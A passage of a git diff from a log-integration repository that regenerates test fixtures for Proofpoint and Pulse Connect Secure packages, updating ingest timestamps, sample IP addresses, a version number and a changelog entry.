"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/01/27T05:21:06.rspici snisi queued-aglife[766]: olor: to=etquasia, delay=nula, xdelay=quiacons, mailer=uisa, pri=xeacommo, relay=[10.65.174.31], dsn=atur, stat=issu", "event": { - "ingested": "2021-06-09T13:10:40.442201400Z" + "ingested": "2021-12-14T14:54:22.370442617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/02/10T12:23:41.ite tasnul note[tuserr]: note tise very-high s=tnul m=expl x=ess module=quiad action=cancel size=6084", "event": { - "ingested": "2021-06-09T13:10:40.442205600Z" + "ingested": "2021-12-14T14:54:22.370443006Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/02/24T19:26:15.llumq tenim spam_init[eiusmo]: warn ainc medium mod=antiumdo type=ecill cmd=iduntu id=pisci engine=sunt definitions=texplica", "event": { - "ingested": "2021-06-09T13:10:40.442209600Z" + "ingested": "2021-12-14T14:54:22.370443396Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 11 02:28:49 ate action_checksubmsg s=con m=tqu x=eirur action=accept score=tametco submsgadjust=mquisnos spamscore=25.933000 suspectscore=cit malwarescore=siar phishscore=isn adultscore=veniamq bulkscore=lup tests=iumtotam", "event": { - "ingested": "2021-06-09T13:10:40.442213700Z" + "ingested": "2021-12-14T14:54:22.370443783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/03/25T09:31:24.voluptas velill regulation_init[rspic]: err orinrepr high mod=meum type=borumSec cmd=aecatcup id=snisiut action=allow dict=nre file=inB", "event": { - "ingested": "2021-06-09T13:10:40.442217900Z" + "ingested": "2021-12-14T14:54:22.370444172Z" + }, + "ecs": { + 
"version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/04/08T16:33:58.upt ulamc cvt_detect[cept]: err aedictas low pid=4253 mod=orio cmd=gna name=ici status=success err=olu", "event": { - "ingested": "2021-06-09T13:10:40.442222Z" + "ingested": "2021-12-14T14:54:22.370444575Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/04/22T23:36:32.seq moll queued-VoltageEncrypt[2861]: sunt: from=dquianon, size=956, class=itesse, nrcpts=iamqui, msgid=quide, proto=igmp, daemon=cididun, relay=str4641.domain [10.151.31.58]", "event": { - "ingested": "2021-06-09T13:10:40.442226Z" + "ingested": "2021-12-14T14:54:22.370444970Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/05/07T06:39:06.cti rumSecti session_throttle[riamea]: info eca very-high s=tes mod=equam cmd=isi rule=iaecon ip=10.119.38.124 rate=rep crate=remap limit=deri", "event": { - "ingested": "2021-06-09T13:10:40.442230600Z" + "ingested": "2021-12-14T14:54:22.370445356Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 21 13:41:41 scipit high pid=745 mod=cvt cmd=detect cmd=borisnis name=onorumet status=success err=isiutali", "event": { - "ingested": "2021-06-09T13:10:40.442234800Z" + "ingested": "2021-12-14T14:54:22.370445744Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 4 20:44:15 aedict low mod=cvtd cmd=miurere", "event": { - "ingested": "2021-06-09T13:10:40.442240600Z" + "ingested": "2021-12-14T14:54:22.370446128Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/06/19T03:46:49.seq rumSe 
queued-vdedc2v5[tatnonp]: rprt ommo[4821]: idunt: to=expl, delay=olore, xdelay=uian, mailer=atuserro, pri=madminim, relay=[10.52.47.230] [10.113.119.47], dsn=quioff, stat=iuntN", "event": { - "ingested": "2021-06-09T13:10:40.442245100Z" + "ingested": "2021-12-14T14:54:22.370446508Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/07/03T10:49:23.mquis lorsi filter[tetura]: rprt eeufug high mod=modt sig=iduntutl", "event": { - "ingested": "2021-06-09T13:10:40.442249400Z" + "ingested": "2021-12-14T14:54:22.370446912Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 17 17:51:58 expl very-high pid=prehende mod=cvtd cmd=encrypted encrypted=lup", "event": { - "ingested": "2021-06-09T13:10:40.442253900Z" + "ingested": "2021-12-14T14:54:22.370447301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 1 00:54:32 umd sumd medium s=dat mod=session_judge cmd=aUtenima module=turQuis rule=taevi", "event": { - "ingested": "2021-06-09T13:10:40.442258200Z" + "ingested": "2021-12-14T14:54:22.370447679Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/08/15T07:57:06.ercitati eve spf_run[rro]: err oeiusmo very-high s=cusanti m=tconse x=rem mod=tseddoei cmd=teursint rule=etMa duration=llita", "event": { - "ingested": "2021-06-09T13:10:40.442262300Z" + "ingested": "2021-12-14T14:54:22.370448088Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/08/29T14:59:40.nostrum orroquis av_init[eumi]: info tvo low mod=tuser type=mmo cmd=eve id=nbyCicer vendor=scipit engine=equuntu definitions=quamni signatures=turveli", "event": { - "ingested": 
"2021-06-09T13:10:40.442266500Z" + "ingested": "2021-12-14T14:54:22.370448472Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 12 22:02:15 ihilm medium s=caboNemo mod=mltr uptas", "event": { - "ingested": "2021-06-09T13:10:40.442270600Z" + "ingested": "2021-12-14T14:54:22.370448848Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/09/27T05:04:49.dol exe info[tis]: note oluptat low eid=tinvolup pid=497 status=tvol", "event": { - "ingested": "2021-06-09T13:10:40.442274900Z" + "ingested": "2021-12-14T14:54:22.370449235Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 11 12:07:23 eritqui medium s=atus mod=session_judge cmd=tassitas module=obea rule=velite", "event": { - "ingested": "2021-06-09T13:10:40.442278800Z" + "ingested": "2021-12-14T14:54:22.370449617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/10/25T19:09:57.lore luptate av_init[eritqu]: err elites very-high mod=tamr type=serr cmd=usci id=unturmag vendor=dexeaco engine=lupta definitions=ura signatures=oreeufug", "event": { - "ingested": "2021-06-09T13:10:40.442282900Z" + "ingested": "2021-12-14T14:54:22.370450Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/11/09T02:12:32.ree itten milter_listen[quipexea]: warn orsitv medium mod=nostrum cmd=autodita addr=10.27.154.247", "event": { - "ingested": "2021-06-09T13:10:40.442286900Z" + "ingested": "2021-12-14T14:54:22.370450388Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/11/23T09:15:06.utfugi ursintoc 
dkimv_type[tio]: rprt mmodicon: high mod=trudex unexpected response type=tvol", "event": { - "ingested": "2021-06-09T13:10:40.442308700Z" + "ingested": "2021-12-14T14:54:22.370450773Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2018/12/07T16:17:40.rehen uaeab session_throttle[ptat]: warn mipsu high s=eturadip mod=amquaera cmd=rsitamet rule=leumiur ip=10.253.121.154 rate=olesti crate=edquia limit=ihi", "event": { - "ingested": "2021-06-09T13:10:40.442315100Z" + "ingested": "2021-12-14T14:54:22.370451153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 21 23:20:14 emoenimi high pid=5895 mod=cvt cmd=detect cmd=mqu name=onorume status=unknown err=veleu", "event": { - "ingested": "2021-06-09T13:10:40.442332400Z" + "ingested": "2021-12-14T14:54:22.370451644Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 5 06:22:49 dquia high s=bori mod=mltr dipi", "event": { - "ingested": "2021-06-09T13:10:40.442345300Z" + "ingested": "2021-12-14T14:54:22.370452040Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 19 13:25:23 quovolu high s=dexe mod=mltr nemul", "event": { - "ingested": "2021-06-09T13:10:40.442349700Z" + "ingested": "2021-12-14T14:54:22.370452446Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/02/02T20:27:57.quatur dminim mail_msg[ptatevel]: warn aperiame very-high s=eirured mod=sequamn cmd=perspici module=inimve rule=aea action=allow attachments=5821 rcpts=296 routes=ptat size=4878 guid=nde hdr_mid=quame qid=orumwri subject=atisu spamscore=66.849000 virusname=tse duration=rad elapsed=iat", "event": { - 
"ingested": "2021-06-09T13:10:40.442353900Z" + "ingested": "2021-12-14T14:54:22.370452834Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/02/17T03:30:32.lorum suntexpl sm-msp-queue[iqu]: rprt iquamqu[6293]: audant: to=obeata, ctladdr=uredol, delay=uptat, xdelay=toditau, mailer=uiad, pri=nvolupta, relay=[10.80.133.120] [10.147.147.248], dsn=onpr, stat=uira", "event": { - "ingested": "2021-06-09T13:10:40.442358100Z" + "ingested": "2021-12-14T14:54:22.370453216Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/03/03T10:33:06.aliqu sequine regulation_refresh[utaliqui]: note isciv very-high mod=econ type=aborio cmd=rve id=catcup action=deny dict=runtmoll file=busBon", "event": { - "ingested": "2021-06-09T13:10:40.442362100Z" + "ingested": "2021-12-14T14:54:22.370453600Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/03/17T17:35:40.occaeca dan queued-alert[pta]: err upt[4762]: itaedict: to=eroi, delay=onemull, xdelay=mdo, mailer=labore, pri=lorem, relay=[10.68.159.207] [10.232.240.177], dsn=estq, stat=quasiarc", "event": { - "ingested": "2021-06-09T13:10:40.442373Z" + "ingested": "2021-12-14T14:54:22.370453990Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/04/01T00:38:14.tDuisaut uel warn[dexerc]: info vol high eid=agn status=\"iqu file: quamqua\"", "event": { - "ingested": "2021-06-09T13:10:40.442380700Z" + "ingested": "2021-12-14T14:54:22.370454372Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 15 07:40:49 uunturm very-high mod=regulation type=iaconseq cmd=init id=tseddo action=cancel dict=rissusci 
file=ectetur", "event": { - "ingested": "2021-06-09T13:10:40.442386200Z" + "ingested": "2021-12-14T14:54:22.370454746Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 29 14:43:23 quaturve medium mod=zerohour type=gnamali cmd=init id=iumtota version=issusci", "event": { - "ingested": "2021-06-09T13:10:40.442390900Z" + "ingested": "2021-12-14T14:54:22.370455130Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/05/13T21:45:57.ecillumd iumto dmarc_type[sequatu]: rprt tiumtot: medium mod=mdoloree type=que cmd=inBCSed id=cteturad policy_cache_entries=umq", "event": { - "ingested": "2021-06-09T13:10:40.442404500Z" + "ingested": "2021-12-14T14:54:22.370455519Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 28 04:48:31 reseo quam very-high s=pariat mod=mail_env_rcpt cmd=icaboNe r=4840 value=lumd verified=tiaec routes=lorem", "event": { - "ingested": "2021-06-09T13:10:40.442413Z" + "ingested": "2021-12-14T14:54:22.370455924Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 11 11:51:06 seq low mod=info sys=lorsita evt=deny active=itation expires=utlabo msg=tat", "event": { - "ingested": "2021-06-09T13:10:40.442418300Z" + "ingested": "2021-12-14T14:54:22.370456327Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 25 18:53:40 ididu medium s=epteurs mod=mail_env_from cmd=itse value=rever ofrom=sBonoru qid=ecatcu tls=ntoccae routes=iscive notroutes=amni host=etconse5657.api.lan ip=10.118.249.126 sampling=dminimv", "event": { - "ingested": "2021-06-09T13:10:40.442422600Z" + "ingested": "2021-12-14T14:54:22.370456711Z" + }, + "ecs": 
{ + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/07/10T01:56:14.rep nostru access_load[docons]: info emipsumq low mod=qua type=modit cmd=tatione id=aedicta", "event": { - "ingested": "2021-06-09T13:10:40.442426600Z" + "ingested": "2021-12-14T14:54:22.370457103Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 24 08:58:48 uas high s=reeufu mod=mail_env_from cmd=umexe value=xce ofrom=omnisis qid=corporis tls=tco routes=stiaec notroutes=Cicero host=ven5410.mail.host ip=10.170.55.203 sampling=deom", "event": { - "ingested": "2021-06-09T13:10:40.442430600Z" + "ingested": "2021-12-14T14:54:22.370457491Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/08/07T16:01:23.Utenima nse info[umq]: note enim low mod=meaquei sys=snisiu evt=allow active=atev expires=vento msg=litsed", "event": { - "ingested": "2021-06-09T13:10:40.442434700Z" + "ingested": "2021-12-14T14:54:22.370457877Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 21 23:03:57 susc taed high s=mipsumd mod=mail_continue-system-sendmail cmd=eiusmo action=block err=sum", "event": { - "ingested": "2021-06-09T13:10:40.442438600Z" + "ingested": "2021-12-14T14:54:22.370458263Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 5 06:06:31 ipex low s=upta cmd=send profile=ivel qid=tmollita rcpts=tionofd", "event": { - "ingested": "2021-06-09T13:10:40.442442600Z" + "ingested": "2021-12-14T14:54:22.370458649Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/09/19T13:09:05.ccaec repreh 
http_listen[imven]: note usan very-high mod=idolo cmd=olup addr=10.199.46.88", "event": { - "ingested": "2021-06-09T13:10:40.442446800Z" + "ingested": "2021-12-14T14:54:22.370459037Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/10/03T20:11:40.nulapari beataevi queued-VoltageEncrypt[3274]: eruntmol: from=plicab, size=5930, class=dmin, nrcpts=sum, msgid=lloinve, proto=ggp, daemon=nim, relay=Sedutper7794.www5.domain [10.154.22.241]", "event": { - "ingested": "2021-06-09T13:10:40.442450900Z" + "ingested": "2021-12-14T14:54:22.370459426Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/10/18T03:14:14.nvol doloreeu cvtd_encrypted[elillumq]: info loremeum medium pid=obeataev mod=rrorsit encrypted=aincid", "event": { - "ingested": "2021-06-09T13:10:40.442456600Z" + "ingested": "2021-12-14T14:54:22.370459810Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 1 10:16:48 nis info pid=472 iin /uteiru: xer", "event": { - "ingested": "2021-06-09T13:10:40.442460500Z" + "ingested": "2021-12-14T14:54:22.370460215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "2019/11/15T17:19:22.isauteir eritquii soap_listen[atevelit]: note dese low mod=ionula cmd=itaed addr=10.38.111.125", "event": { - "ingested": "2021-06-09T13:10:40.442464300Z" + "ingested": "2021-12-14T14:54:22.370460593Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 30 00:21:57 ationem high mod=spam type=ing cmd=load id=ollita", "event": { - "ingested": "2021-06-09T13:10:40.442468100Z" + "ingested": "2021-12-14T14:54:22.370461Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event"
diff --git a/packages/proofpoint/manifest.yml b/packages/proofpoint/manifest.yml
index 98de92ad504..b2beae762a4 100644
--- a/packages/proofpoint/manifest.yml
+++ b/packages/proofpoint/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: proofpoint
 title: Proofpoint Email Security Logs
-version: 0.5.0
+version: 0.5.1
 description: Collect logs from Proofpoint Email Security devices with Elastic Agent.
 categories: ["security"]
 release: experimental
diff --git a/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log b/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log
index 12d75f55caa..f9db0cf39a0 100644
--- a/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log
+++ b/packages/pulse_connect_secure/_dev/deploy/docker/sample_logs/test-syslog.log
@@ -1,7 +1,7 @@
-Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [55.53.160.32] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 55.53.160.32
-Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 55.53.160.32 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.
-Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop
-Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)
-Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)
-Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured
-Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [55.53.160.32] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM (session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 
09:05:47 2021/10/19). Idle session identified during routine system scan.
\ No newline at end of file
+Oct 19 09:16:53 pcs-node1 1 2021-10-19T09:16:53+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:53 - pcs-node1 - [89.160.20.156] user.name(REALM)[] - Primary authentication successful for user.name/REALM from 89.160.20.156
+Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Agent login succeeded for user.name/REALM (session:sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) from 89.160.20.156 with Pulse-Secure/9.1.13.11723 (Windows 10) Pulse/9.1.13.11723.
+Oct 19 09:10:35 pcs-node1 1 2021-10-19T09:10:35+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:10:35 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - VPN Tunneling: Session started for user (session: sid74fa8e00ca601280318287f67dfaee7cc6da40db0be6ac75) with IPv4 address 172.22.27.209, hostname Desktop
+Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)
+Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)
+Oct 19 09:11:19 pcs-node1 1 2021-10-19T09:11:19+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:11:19 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - User user.name denied access as the client version '9.1.11.6725' is lower than the minimum client version configured
+Oct 19 09:16:34 pcs-node1 1 2021-10-19T09:16:34+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 09:16:34 - pcs-node1 - [89.160.20.156] user.name(REALM)[REALM_ROLES] - Session timed out for user.name/REALM 
(session:sid03ac4653fd74a5ac36cffb2783be3309590f3d616617a4a7) due to inactivity (last access at 09:05:47 2021/10/19). Idle session identified during routine system scan.
\ No newline at end of file
diff --git a/packages/pulse_connect_secure/changelog.yml b/packages/pulse_connect_secure/changelog.yml
index 3bd00b6ba1b..75dea7240db 100644
--- a/packages/pulse_connect_secure/changelog.yml
+++ b/packages/pulse_connect_secure/changelog.yml
@@ -1,4 +1,9 @@
 # newer versions go on top
+- version: "0.0.2"
+ changes:
+ - description: Regenerate test files using the new GeoIP database
+ type: bugfix
+ link: https://github.com/elastic/integrations/pull/2339
 - version: "0.0.1"
 changes:
 - description: initial release
diff --git a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log
index 0793d631385..1fa48896d42 100644
--- a/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log
+++ b/packages/pulse_connect_secure/data_stream/log/_dev/test/pipeline/test-log-admin.log
@@ -1,10 +1,10 @@
-Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [55.53.160.32] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)
-Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 55.53.160.32 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)
-Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM
-Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM
-Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Login failed. Reason: Wrong Password
-Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 55.53.160.32
-Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). 
Reason: Failed
-Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM
-Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM
-Oct 19 10:21:07 pcs-node1 1 2021-10-19T10:21:07+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:21:07 - pcs-node1 - [55.53.160.32] admin(ADMIN_REALM)[] - Primary authentication successful for admin/Administrators fr
+Oct 19 10:20:40 pcs-node1 1 2021-10-19T10:20:40+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:40 - pcs-node1 - [89.160.20.156] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/welcome.cgi?p=forced-off)
+Oct 19 10:20:41 pcs-node1 1 2021-10-19T10:20:41+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:41 - pcs-node1 - [127.0.0.1] System()[] - Connection from IP 89.160.20.156 not authenticated yet (URL=/dana-na/auth/url_o2d6zvh39ac6C92s/welcome.cgi?p=forced-off)
+Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Source IP realm restrictions successfully passed for admin/ADMIN_REALM
+Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - User Limit realm restrictions successfully passed for admin/ADMIN_REALM
+Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Login failed. 
Reason: Wrong Password
+Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[] - Primary authentication failed for admin/Administrators from 89.160.20.156
+Oct 19 10:20:57 pcs-node1 1 2021-10-19T10:20:57+02:00 10.5.2.3 PulseSecure: - - - 2021-10-19 10:20:57 - pcs-node1 - [89.160.20.156] admin(ADMIN_REALM)[ADMIN_ROLE] - Login failed using auth server Administrators (Local Authentication). Reason: Failed
